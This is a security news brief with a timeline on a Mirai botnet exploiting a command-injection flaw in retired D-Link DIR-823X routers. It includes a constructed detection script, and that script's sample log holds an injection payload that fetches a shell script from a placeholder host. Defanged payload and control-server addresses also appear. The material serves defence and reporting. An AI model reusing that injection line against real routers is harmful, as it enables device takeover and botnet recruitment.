Mirai Botnet Exploits CVE-2025-29635 in End-of-Life D-Link DIR-823X Routers
A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection flaw in end-of-life D-Link DIR-823X routers, marking the first reported in-the-wild abuse of the vulnerability since its public disclosure and proof-of-concept release in 2025. Akamai said it began seeing attacks in early March 2026 through crafted POST requests to the /goform/set_prohibiting endpoint, where unsanitized input reaches system() and enables remote command execution on affected firmware versions 240126 and 240802. The activity targets discontinued devices unlikely to receive vendor fixes, increasing exposure for organizations still running the routers.
The attackers use the exploit to fetch and run a shell script that installs a Mirai variant dubbed tuxnokill, which retains common Mirai strings while using XOR obfuscation with key 0x30. Akamai linked the same actor to similar Mirai deployment patterns against TP-Link AX21 devices via CVE-2023-1389 and against ZTE ZXV10 H108L routers through another remote code execution flaw, underscoring continued botnet weaponization of older, publicly documented vulnerabilities. Security advisories recommend replacing unsupported D-Link hardware, restricting exposed administrative interfaces, and rapidly remediating known router flaws before they are folded into botnet operations.
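As an added defender-side example (not code from the page, Akamai or the reporting vendors), the script below flags POST requests to /goform/set_prohibiting whose body carries shell metacharacters in constructed access-log lines, and recovers single-byte XOR (key 0x30) obfuscated strings from a constructed byte blob, the kind of triage step one would take on a tuxnokill sample. The log layout with the body in a trailing quoted field, the parameter name x, the PAYLOAD_HOST placeholder and the embedded sample strings are assumptions.

```python
import re

# Constructed access-log lines (combined-log shape with the POST body appended
# in a trailing quoted field by a hypothetical reverse proxy). Not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Mar/2026:10:15:01 +0000] "POST /goform/set_prohibiting HTTP/1.1" '
    '200 12 "x=1;wget http://PAYLOAD_HOST/dlink.sh"',
    '203.0.113.6 - - [02/Mar/2026:10:15:03 +0000] "POST /goform/set_prohibiting HTTP/1.1" '
    '200 12 "x=1"',
    '203.0.113.7 - - [02/Mar/2026:10:15:05 +0000] "GET /index.html HTTP/1.1" 200 1024 ""',
]

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)
VULN_PATH = "/goform/set_prohibiting"   # endpoint named in the Akamai report
SHELL_META = re.compile(r"[;|&`$\n]")   # characters that matter once input reaches system()


def flag_requests(lines):
    """Return POSTs to the vulnerable endpoint whose body carries shell metacharacters."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        on_endpoint = m["method"] == "POST" and m["path"].split("?")[0] == VULN_PATH
        if on_endpoint and SHELL_META.search(m["body"]):
            hits.append({"src": m["src"], "ts": m["ts"], "body": m["body"]})
    return hits


def xor_decode(data: bytes, key: int = 0x30) -> bytes:
    """Single-byte XOR; the same call both encodes and decodes."""
    return bytes(b ^ key for b in data)


def recover_strings(blob: bytes, key: int = 0x30, min_len: int = 6):
    """Triage aid: XOR the whole blob and keep runs of printable ASCII.
    Obfuscated strings become readable; plaintext regions turn into noise and drop out."""
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, xor_decode(blob, key))
    return [r.decode("ascii") for r in runs]


# Constructed stand-in for a sample: two obfuscated strings between non-printable filler.
SAMPLE_BLOB = (b"\xff\x80" + xor_decode(b"tuxnokill") + b"\xff\xff"
               + xor_decode(b"sample-string-two") + b"\x80")

if __name__ == "__main__":
    for h in flag_requests(SAMPLE_LOG):
        print("suspicious:", h)
    print("recovered:", recover_strings(SAMPLE_BLOB))
```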

How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
HKCERT issues alert on Mirai targeting end-of-life D-Link routers
HKCERT published a security bulletin warning that Mirai botnet activity was targeting end-of-life D-Link routers affected by CVE-2025-29635. The alert followed Akamai's findings and extended the notification to a broader defender audience.
Akamai publicly reports the Mirai campaign targeting D-Link routers
Akamai published research detailing the Mirai campaign targeting end-of-life D-Link DIR-823X routers via CVE-2025-29635 and warned that older, publicly documented flaws continue to be weaponized. The report urged organizations to replace retired devices and improve patching and exposure management.
Akamai links same actor to TP-Link and ZTE router exploitation
Akamai assessed that the same threat actor was also exploiting CVE-2023-1389 in TP-Link AX21 routers and a remote code execution flaw in ZTE ZXV10 H108L routers using a similar Mirai deployment pattern. This expanded the campaign beyond D-Link devices to multiple router brands.
Attackers deploy tuxnokill Mirai variant on compromised routers
The observed campaign downloaded and executed a shell script named dlink.sh to install a Mirai variant called tuxnokill on compromised D-Link routers. Reporting also identified infrastructure including payload host 88.214.20[.]14 and command-and-control server 64.89.161[.]130:44300.
Akamai observes Mirai exploitation of CVE-2025-29635
In early March 2026, Akamai SIRT detected in-the-wild exploitation of CVE-2025-29635 against D-Link DIR-823X routers, marking the first observed active abuse of the flaw. Attackers used crafted POST requests to the /goform/set_prohibiting endpoint to execute commands on vulnerable devices.
Researchers disclose CVE-2025-29635 in D-Link DIR-823X routers
Researchers Wang Jinshuai and Zhao Jiangting publicly disclosed CVE-2025-29635, a command-injection flaw in D-Link DIR-823X routers, and proof-of-concept exploit details became available around the same time. The vulnerability later became the basis for Mirai botnet exploitation.
D-Link DIR-823X routers reach end of life
The affected D-Link DIR-823X devices reached end-of-life status, reducing the likelihood of vendor security fixes for CVE-2025-29635. Subsequent reporting recommended replacing the unsupported routers or restricting exposed administration access.
Sources
Discontinued D-Link routers subjected to Mirai botnet targeting (SC Media brief, scworld.com)
Botnet Alert - Mirai Botnet Targets End-of-Life D-Link Routers (HKCERT, hkcert.org)
Mirai Botnet exploits CVE-2025-29635 to target legacy D-Link routers (Security Affairs, securityaffairs.com)
New Mirai campaign exploits RCE flaw in EoL D-Link routers (BleepingComputer, bleepingcomputer.com)
CVE-2025-29635: Mirai Campaign Targets D-Link Devices (Akamai, akamai.com)